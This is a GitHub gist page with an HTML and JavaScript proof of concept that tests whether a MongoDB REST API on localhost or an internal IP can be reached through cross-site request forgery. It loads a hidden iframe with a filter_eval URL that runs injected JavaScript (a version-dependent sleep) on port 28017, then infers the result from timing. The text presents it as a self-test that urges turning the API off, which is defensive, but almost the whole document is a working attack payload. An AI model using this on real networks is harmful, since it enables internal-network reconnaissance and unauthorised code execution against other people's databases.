Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
<html>
<head>
<title>MongoDB REST API timing attack</title>
</head>
<body>
<div>
<h1>MongoDB REST API timing attack</h1>
<p>Test if MongoDB's REST API exploitable through CSRF on your localhost or on a host in your internal network. This poses a security risk and you should deactivate it.</p>
To check IP <input value = "127.0.0.1" id = "ip"> for version
<select id = "version">
<option value = "2">2</option>
<option value = "3">3</option>
</select>
click on <button onclick = "check()">check</button>
</div>
<script>
function check()
{
target_ip = document.getElementById('ip').value
console.log(target_ip);
version = document.getElementById('version').value
first_date = Date.now()
attack_iframe = document.createElement('iframe');
document.body.appendChild(attack_iframe);
attack_iframe.style = "visibility:hidden;";
attack_iframe.onload = function(){
second_date = Date.now()
time = second_date-first_date;
console.log(time)
if(time > 2000)
{
alert('Possible match.\nThere might be mongodb '+version+'.x on IP '+target_ip+'\nPlease consider to deactivate it as database commands can be issued even if it\'s just a testing environment.')
}
else
{
alert('There is either no mongodb running on '+target_ip+',\nit wasn\'t started with --rest,\na different port is used\nor another problem occured')
}
}
url = 'http://'+target_ip+':28017/admin/$cmd/?filter_eval=function(){if(db.version().charAt(0)=='+version+'){sleep(2000)}}&limit=1';
console.log(url);
attack_iframe.src=url;
}
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.